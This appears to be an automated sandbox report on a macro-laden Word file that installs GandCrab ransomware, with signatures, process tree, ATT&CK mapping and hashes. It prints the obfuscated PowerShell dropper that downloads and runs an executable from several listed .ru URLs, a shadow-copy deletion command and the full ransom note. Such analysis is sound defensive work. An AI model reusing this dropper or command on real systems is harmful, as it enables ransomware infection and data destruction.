Overview

overview

10

Static

static

8

dcf3c03887...b.docm

windows7_x64

10

dcf3c03887...b.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm

  • Size

    78KB

  • MD5

    fe2d1caa2d52000efcd19ea1ea31d254

  • SHA1

    6496aa6a299bc606ee9d058bdf4f0d826a2e4541

  • SHA256

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb

  • SHA512

    592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d

Score
10/10
gandcrabbackdoorransomwarespywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
exe.dropper

http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
exe.dropper

https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
exe.dropper

http://sndtgo.ru/word.exe
exe.dropper

http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe

Extracted

Path

C:\JQGGQ-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .JQGGQ The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDp9MXJJpDJAuOVoeDXRXjIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSAiCTtLyJKNBeBnZq+8Y6R7O3ObGdmdaRi0fWP4ry9fNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhKAuoTbFqJ2FPDKx4ChAudDoPVoM6j2VyOmsqBtvY7wLrt8yoi8C1f6lXTmV7q94EOxhgW2wOkzbb5IfuNxGLSuj7biAwDPiqTOLKPGgho2ZWKT+7AkCvGii2IEZErpE7CNmAIThyNQQIFD1UkGNybmMPZ1M1lI/p+RNe2IEi3TJCr7rN9c= ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9

Signatures

  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 28 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1732
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\windows\temp\229.exe
          "C:\windows\temp\229.exe"
          4⤵
          • Executes dropped EXE
          • Modifies extensions of user files
          • Drops startup file
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1944
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin delete shadows /all /quiet
              6⤵
              • Interacts with shadow copies
              PID:740
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1408
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x550
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1708
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1680

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    File Deletion

    2
    T1107

    Modify Registry

    2
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    2
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    3
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Inhibit System Recovery

    2
    T1490

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
      Filesize

      4.0MB

      MD5

      b1cff93a5ffaa02a482145399dd2ca08

      SHA1

      2f6c2f98ab25544ac4141542e55db167a4b66cd4

      SHA256

      45130fa2ce44505b355def932b862ac2c4c64c760e8a62fe4fafa543caa6b99c

      SHA512

      a7e203a702b562ee40aaacacad43553e092c850c2fb3c4cc1020f2cc54236705636b55e4b876e11b5df676c2e6c9721fee31feccffca7f92ef4b128a81ce59e4

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
      Filesize

      37KB

      MD5

      4f13d08e827b2e667f511902c02da790

      SHA1

      fb951c9bc90b6ab09ff148ca590c61b108c4d9de

      SHA256

      8451b29eb14b901aa9d44fb7dbec865df4a2d6c75b05361ce556a9b99a1d09fb

      SHA512

      72d4ce0990b6f4e66f06e6a7addcaa95903774732f2cec999ffd1e38df683bc889b556f87e21d1c3aa9ab61d412ba4734fa768aea6b898718f66ed199de58b3c

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      Download Submit
    • C:\Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

      Download Submit
    • \Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

      Download Submit
    • memory/556-81-0x000000006A530000-0x000000006AADB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/556-79-0x0000000004AA0000-0x0000000004BB4000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/556-76-0x0000000000000000-mapping.dmp
      Download
    • memory/564-75-0x0000000000000000-mapping.dmp
      Download
    • memory/740-92-0x0000000000000000-mapping.dmp
      Download
    • memory/1408-78-0x0000000000000000-mapping.dmp
      Download
    • memory/1408-80-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1476-87-0x00000000002B0000-0x00000000002D0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/1476-83-0x0000000000000000-mapping.dmp
      Download
    • memory/1476-86-0x0000000000400000-0x000000000048D000-memory.dmp
      Filesize

      564KB

      Download
    • memory/1732-60-0x00000000007DB000-0x00000000007DF000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1732-54-0x0000000072471000-0x0000000072474000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1732-61-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

      Download
    • memory/1732-59-0x00000000007DB000-0x00000000007DF000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1732-62-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

      Download
    • memory/1732-63-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

      Download
    • memory/1732-58-0x0000000070EDD000-0x0000000070EE8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1732-57-0x00000000755C1000-0x00000000755C3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1732-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1732-55-0x000000006FEF1000-0x000000006FEF3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1944-91-0x0000000000000000-mapping.dmp
      Download